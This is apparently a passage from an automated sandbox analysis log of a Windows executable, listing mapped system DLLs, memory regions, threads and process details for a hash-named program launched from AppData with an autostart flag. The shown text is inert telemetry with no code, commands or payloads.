region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1453 start_va = 0x7fefc260000 end_va = 0x7fefc2a6fff monitored = 0 entry_point = 0x7fefc261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1454 start_va = 0x7fefc560000 end_va = 0x7fefc577fff monitored = 0 entry_point = 0x7fefc563b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1455 start_va = 0x7fefc6d0000 end_va = 0x7fefc6f1fff monitored = 0 entry_point = 0x7fefc6d5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1456 start_va = 0x7fefc750000 end_va = 0x7fefc77efff monitored = 0 entry_point = 0x7fefc751064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1457 start_va = 0x7fefc790000 end_va = 0x7fefc7fcfff monitored = 0 entry_point = 0x7fefc791010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1458 start_va = 0x7fefcb00000 end_va = 0x7fefcb0afff monitored = 0 entry_point = 0x7fefcb01030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1459 start_va = 0x7fefcb30000 end_va = 0x7fefcb54fff monitored = 0 entry_point = 0x7fefcb39658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1460 start_va = 0x7fefcb60000 end_va = 0x7fefcb6efff monitored = 0 entry_point = 0x7fefcb61010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1461 start_va = 0x7fefcc10000 end_va = 0x7fefcc4cfff monitored = 0 entry_point = 0x7fefcc118f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1462 start_va = 0x7fefcc50000 end_va = 0x7fefcc63fff monitored = 0 entry_point = 0x7fefcc510e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1463 start_va = 0x7fefcc70000 end_va = 0x7fefcc7efff monitored = 0 entry_point = 0x7fefcc719b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1464 start_va = 0x7fefcd10000 end_va = 0x7fefcd1efff monitored = 0 entry_point = 0x7fefcd11020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1465 start_va = 0x7fefcd20000 end_va = 0x7fefcd8bfff monitored = 0 entry_point = 0x7fefcd22780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1466 start_va = 0x7fefcd90000 end_va = 0x7fefcefcfff monitored = 0 entry_point = 0x7fefcd910b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1467 start_va = 0x7fefcf00000 end_va = 0x7fefcf35fff monitored = 0 entry_point = 0x7fefcf01474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1468 start_va = 0x7fefcf40000 end_va = 0x7fefcf59fff monitored = 0 entry_point = 0x7fefcf41558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1469 start_va = 0x7fefd000000 end_va = 0x7fefd03afff monitored = 0 entry_point = 0x7fefd001324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1470 start_va = 0x7fefd420000 end_va = 0x7fefd486fff monitored = 0 entry_point = 0x7fefd42b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1471 start_va = 0x7fefd490000 end_va = 0x7fefd4dcfff monitored = 0 entry_point = 0x7fefd491070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1472 start_va = 0x7fefd4e0000 end_va = 0x7fefd6e2fff monitored = 0 entry_point = 0x7fefd503330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1473 start_va = 0x7fefd6f0000 end_va = 0x7fefe477fff monitored = 0 entry_point = 0x7fefd76cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1474 start_va = 0x7fefe480000 end_va = 0x7fefe656fff monitored = 0 entry_point = 0x7fefe481010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1475 start_va = 0x7fefe680000 end_va = 0x7fefe7acfff monitored = 0 entry_point = 0x7fefe6ced50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1476 start_va = 0x7fefe7b0000 end_va = 0x7fefe88afff monitored = 0 entry_point = 0x7fefe7d0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1477 start_va = 0x7fefe890000 end_va = 0x7fefe900fff monitored = 0 entry_point = 0x7fefe8a1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1478 start_va = 0x7fefe910000 end_va = 0x7fefe9d8fff monitored = 0 entry_point = 0x7fefe98a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1479 start_va = 0x7fefea60000 end_va = 0x7fefeab1fff monitored = 0 entry_point = 0x7fefea610d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1480 start_va = 0x7fefeb60000 end_va = 0x7fefeb6dfff monitored = 0 entry_point = 0x7fefeb61080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1481 start_va = 0x7fefeb70000 end_va = 0x7fefec46fff monitored = 0 entry_point = 0x7fefeb73274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1482 start_va = 0x7fefec50000 end_va = 0x7fefec6efff monitored = 0 entry_point = 0x7fefec560e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1483 start_va = 0x7fefec70000 end_va = 0x7fefed0efff monitored = 0 entry_point = 0x7fefec725a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1484 start_va = 0x7fefed10000 end_va = 0x7fefee18fff monitored = 0 entry_point = 0x7fefed11064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1485 start_va = 0x7fefef50000 end_va = 0x7fefefe8fff monitored = 0 entry_point = 0x7fefef51c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1486 start_va = 0x7fefeff0000 end_va = 0x7fefeff7fff monitored = 0 entry_point = 0x7fefeff1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1487 start_va = 0x7feff000000 end_va = 0x7feff02dfff monitored = 0 entry_point = 0x7feff001010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1488 start_va = 0x7feff040000 end_va = 0x7feff040fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1489 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1490 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 1491 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 1492 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 1493 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1494 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1495 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1496 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1497 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1498 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1499 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1500 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1501 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1502 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1503 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1504 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1505 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1506 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1507 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1508 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1509 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1510 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1511 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1512 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1513 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 84 os_tid = 0x140 Thread: id = 85 os_tid = 0x460 Thread: id = 86 os_tid = 0x3c0 Thread: id = 87 os_tid = 0x4a4 Thread: id = 88 os_tid = 0x6d0 Thread: id = 89 os_tid = 0x370 Thread: id = 90 os_tid = 0x7c8 Thread: id = 91 os_tid = 0x680 Thread: id = 92 os_tid = 0x5c8 Thread: id = 93 os_tid = 0x1c4 Thread: id = 94 os_tid = 0xf8 Thread: id = 95 os_tid = 0x3e8 Thread: id = 96 os_tid = 0x3dc Thread: id = 97 os_tid = 0x3d8 Thread: id = 98 os_tid = 0x3c8 Thread: id = 99 os_tid = 0x3c4 Thread: id = 100 os_tid = 0x390 Thread: id = 101 os_tid = 0x380 Thread: id = 102 os_tid = 0x378 Thread: id = 103 os_tid = 0x360 Thread: id = 104 os_tid = 0x35c Thread: id = 105 os_tid = 0x348 Thread: id = 106 os_tid = 0x338 Thread: id = 116 os_tid = 0xcf8 Process: id = "10" image_name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" page_root = "0x4d2c0000" os_pid = "0x778" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x6c4" cmd_line = "\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f454" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1654 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1655 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1656 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1657 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1658 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1659 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1660 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498440 region_type = mapped_file name = "12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") Region: id = 1661 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1662 start_va = 0x77460000 end_va = 0x775dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1663 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1664 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1665 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1666 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1667 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1668 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1669 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1806 start_va = 0x1a0000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1807 start_va = 0x73bf0000 end_va = 0x73c2efff monitored = 0 entry_point = 0x73c1e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1808 start_va = 0x73b90000 end_va = 0x73bebfff monitored = 0 entry_point = 0x73bcf9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1809 start_va = 0x73b80000 end_va = 0x73b87fff monitored = 0 entry_point = 0x73b820f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1810 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1811 start_va = 0x76680000 end_va = 0x7678ffff monitored = 0 entry_point = 0x76693283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1812 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1813 start_va = 0x77160000 end_va = 0x7727efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077160000" filename = "" Region: id = 1814 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1815 start_va = 0x77060000 end_va = 0x77159fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077060000" filename = "" Region: id = 1816 start_va = 0x2540000 end_va = 0x271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1817 start_va = 0x76680000 end_va = 0x7678ffff monitored = 0 entry_point = 0x76693283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1818 start_va = 0x76ab0000 end_va = 0x76af6fff monitored = 0 entry_point = 0x76ab74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1819 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1820 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1821 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1822 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1823 start_va = 0x280000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1824 start_va = 0x75330000 end_va = 0x7542ffff monitored = 0 entry_point = 0x7534b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1825 start_va = 0x75940000 end_va = 0x759cffff monitored = 0 entry_point = 0x75956343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1826 start_va = 0x76a10000 end_va = 0x76a19fff monitored = 0 entry_point = 0x76a136a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1827 start_va = 0x751a0000 end_va = 0x7523cfff monitored = 0 entry_point = 0x751d3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1828 start_va = 0x76960000 end_va = 0x76a0bfff monitored = 0 entry_point = 0x7696a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1829 start_va = 0x75780000 end_va = 0x7581ffff monitored = 0 entry_point = 0x757949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1830 start_va = 0x76b00000 end_va = 0x76b18fff monitored = 0 entry_point = 0x76b04975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1831 start_va = 0x75850000 end_va = 0x7593ffff monitored = 0 entry_point = 0x75860569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1832 start_va = 0x74fb0000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74fca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1833 start_va = 0x74fa0000 end_va = 0x74fabfff monitored = 0 entry_point = 0x74fa10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1834 start_va = 0x2720000 end_va = 0x28dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 1835 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1836 start_va = 0x2720000 end_va = 0x28a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002720000" filename = "" Region: id = 1837 start_va = 0x28d0000 end_va = 0x28dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 1838 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1839 start_va = 0x76fe0000 end_va = 0x7703ffff monitored = 0 entry_point = 0x76ff158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1840 start_va = 0x76b80000 end_va = 0x76c4bfff monitored = 0 entry_point = 0x76b8168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1841 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1842 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1843 start_va = 0x28e0000 end_va = 0x2a60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028e0000" filename = "" Region: id = 1844 start_va = 0x2a70000 end_va = 0x3e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a70000" filename = "" Region: id = 1845 start_va = 0x3e70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 1846 start_va = 0x300000 end_va = 0x391fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1847 start_va = 0x4070000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 1848 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1849 start_va = 0x210000 end_va = 0x214fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1850 start_va = 0x3e70000 end_va = 0x3f8afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 1851 start_va = 0x4060000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 1852 start_va = 0x74f10000 end_va = 0x74f8ffff monitored = 0 entry_point = 0x74f237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1853 start_va = 0x4070000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1854 start_va = 0x2540000 end_va = 0x261efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002540000" filename = "" Region: id = 1855 start_va = 0x2620000 end_va = 0x271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 1856 start_va = 0x74ef0000 end_va = 0x74f02fff monitored = 0 entry_point = 0x74ef1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1857 start_va = 0x210000 end_va = 0x212fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1858 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Thread: id = 117 os_tid = 0x77c [0163.794] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xdb1455a0, dwHighDateTime=0x1d8a8ba)) 